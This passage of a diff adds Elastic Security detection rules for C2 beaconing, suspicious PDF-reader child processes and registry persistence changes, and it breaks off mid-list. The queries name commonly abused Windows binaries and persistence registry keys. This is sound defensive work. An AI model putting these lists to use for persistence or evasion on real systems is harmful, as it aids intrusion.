ansible* or aws* or php* or pip* or python* or steam* or terraform*\n) and \nnot destination.ip:(\n 10.0.0.0/8 or 100.64.0.0/10 or 127.0.0.0/8 or 169.254.0.0/16 or 172.16.0.0/12 or 192.0.0.0/24 or 192.0.0.0/29 or \n 192.0.0.10/32 or 192.0.0.170/32 or 192.0.0.171/32 or 192.0.0.8/32 or 192.0.0.9/32 or 192.0.2.0/24 or \n 192.168.0.0/16 or 192.175.48.0/24 or 192.31.196.0/24 or 192.52.193.0/24 or 192.88.99.0/24 or 198.18.0.0/15 or \n 198.51.100.0/24 or 203.0.113.0/24 or 224.0.0.0/4 or 240.0.0.0/4 or \"::1\" or \"FE80::/10\" or \"FF00::/8\" or 0.0.0.0\n) and\nnot destination.port:(22 or 80 or 443)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "53617418-17b4-4e9c-8a2c-8deb8086ca4b", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n- Filebeat\n- Packetbeat\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n### Packetbeat Setup\nPacketbeat is a real-time network packet analyzer that you can use for application monitoring, performance analytics, and threat detection. Packetbeat works by capturing the network traffic between your application servers, decoding the application layer protocols (HTTP, MySQL, Redis, and so on), correlating the requests with the responses, and recording the interesting fields for each transaction.\n\n#### The following steps should be executed in order to add the Packetbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/packetbeat/current/setup-repositories.html).\n- To run Packetbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/packetbeat/current/running-on-docker.html).\n- For quick start information for Packetbeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-installation-configuration.html).\n- For complete \u201cSetup and Run Packetbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 8 + }, + "id": "53617418-17b4-4e9c-8a2c-8deb8086ca4b_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_4.json b/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_4.json new file mode 100644 index 00000000000..355bae4aad4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_4.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A statistical model has identified command-and-control (C2) beaconing activity. Beaconing can help attackers maintain stealthy communication with their C2 servers, receive instructions and payloads, exfiltrate data and maintain persistence in a network.", + "from": "now-1h", + "index": [ + "ml_beaconing.all" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Statistical Model Detected C2 Beaconing Activity", + "query": "beacon_stats.is_beaconing: true and\nnot process.name: (\"WaAppAgent.exe\" or \"metricbeat.exe\" or \"packetbeat.exe\" or \"WindowsAzureGuestAgent.exe\" or \"HealthService.exe\" or \"Widgets.exe\" or \"lsass.exe\" or \"msedgewebview2.exe\" or \"MsMpEng.exe\" or \"OUTLOOK.EXE\" or \"msteams.exe\" or \"FileSyncHelper.exe\" or \"SearchProtocolHost.exe\" or \"Creative Cloud.exe\" or \"ms-teams.exe\" or \"ms-teamsupdate.exe\" or \"curl.exe\" or \"rundll32.exe\" or \"MsSense.exe\" or \"wermgr.exe\" or \"java\" or \"olk.exe\" or \"iexplore.exe\" or \"NetworkManager\" or \"packetbeat\" or \"Ssms.exe\" or \"NisSrv.exe\" or \"gamingservices.exe\" or \"appidcertstorecheck.exe\" or \"POWERPNT.EXE\" or \"miiserver.exe\" or \"Grammarly.Desktop.exe\" or \"SnagitEditor.exe\" or \"CRWindowsClientService.exe\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/beaconing", + "https://www.elastic.co/security-labs/identifying-beaconing-malware-using-elastic" + ], + "related_integrations": [ + { + "package": "beaconing", + "version": "^1.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "beacon_stats.is_beaconing", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5397080f-34e5-449b-8e9c-4c8083d7ccc6", + "setup": "## Setup\n\nThe rule requires the Network Beaconing Identification integration assets to be installed, as well as network logs collected by the Elastic Defend or Network Packet Capture integrations.\n\n### Network Beaconing Identification Setup\nThe Network Beaconing Identification integration consists of a statistical framework to identify C2 beaconing activity in network logs.\n\n#### Prerequisite Requirements:\n- Fleet is required for Network Beaconing Identification.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Network Beaconing Identification integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Network Beaconing Identification and select the integration to see more details about it.\n- Under Settings, click \"Install Network Beaconing Identification assets\" and follow the prompts to install the assets.\n", + "severity": "low", + "tags": [ + "Domain: Network", + "Use Case: C2 Beaconing Detection", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + "reference": "https://attack.mitre.org/techniques/T1102/", + "subtechnique": [ + { + "id": "T1102.002", + "name": "Bidirectional Communication", + "reference": "https://attack.mitre.org/techniques/T1102/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "5397080f-34e5-449b-8e9c-4c8083d7ccc6_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_109.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_109.json new file mode 100644 index 00000000000..4c23467e472 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_109.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious PDF Reader Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious PDF Reader Child Process\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This creates a vector where attackers can exploit the engines and technology behind this class of software for initial access or privilege escalation.\n\nThis rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve PDF documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"AcroRd32.exe\",\n \"Acrobat.exe\",\n \"FoxitPhantomPDF.exe\",\n \"FoxitReader.exe\") and\n process.name : (\"arp.exe\", \"dsquery.exe\", \"dsget.exe\", \"gpresult.exe\", \"hostname.exe\", \"ipconfig.exe\", \"nbtstat.exe\",\n \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"ping.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"reg.exe\", \"sc.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\",\n \"whoami.exe\", \"bginfo.exe\", \"cdb.exe\", \"cmstp.exe\", \"csi.exe\", \"dnx.exe\", \"fsi.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"Microsoft.Workflow.Compiler.exe\", \"msbuild.exe\", \"mshta.exe\",\n \"msxsl.exe\", \"odbcconf.exe\", \"rcsi.exe\", \"regsvr32.exe\", \"xwizard.exe\", \"atbroker.exe\",\n \"forfiles.exe\", \"schtasks.exe\", \"regasm.exe\", \"regsvcs.exe\", \"cmd.exe\", \"cscript.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"wmic.exe\", \"wscript.exe\", \"bitsadmin.exe\", \"certutil.exe\", \"ftp.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "53a26770-9cbd-40c5-8b57-61d01a325e14_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_110.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_110.json new file mode 100644 index 00000000000..2d557989763 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_110.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious PDF Reader Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious PDF Reader Child Process\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This creates a vector where attackers can exploit the engines and technology behind this class of software for initial access or privilege escalation.\n\nThis rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve PDF documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"AcroRd32.exe\",\n \"Acrobat.exe\",\n \"FoxitPhantomPDF.exe\",\n \"FoxitReader.exe\") and\n process.name : (\"arp.exe\", \"dsquery.exe\", \"dsget.exe\", \"gpresult.exe\", \"hostname.exe\", \"ipconfig.exe\", \"nbtstat.exe\",\n \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"ping.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"reg.exe\", \"sc.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\",\n \"whoami.exe\", \"bginfo.exe\", \"cdb.exe\", \"cmstp.exe\", \"csi.exe\", \"dnx.exe\", \"fsi.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"Microsoft.Workflow.Compiler.exe\", \"msbuild.exe\", \"mshta.exe\",\n \"msxsl.exe\", \"odbcconf.exe\", \"rcsi.exe\", \"regsvr32.exe\", \"xwizard.exe\", \"atbroker.exe\",\n \"forfiles.exe\", \"schtasks.exe\", \"regasm.exe\", \"regsvcs.exe\", \"cmd.exe\", \"cscript.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"wmic.exe\", \"wscript.exe\", \"bitsadmin.exe\", \"certutil.exe\", \"ftp.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "53a26770-9cbd-40c5-8b57-61d01a325e14_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_106.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_106.json new file mode 100644 index 00000000000..38482fe15e2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_106.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to registry persistence keys that are not commonly used or modified by legitimate programs. This could be an indication of an adversary's attempt to persist in a stealthy manner.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Uncommon Registry Persistence Change", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n length(registry.data.strings) > 0 and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n 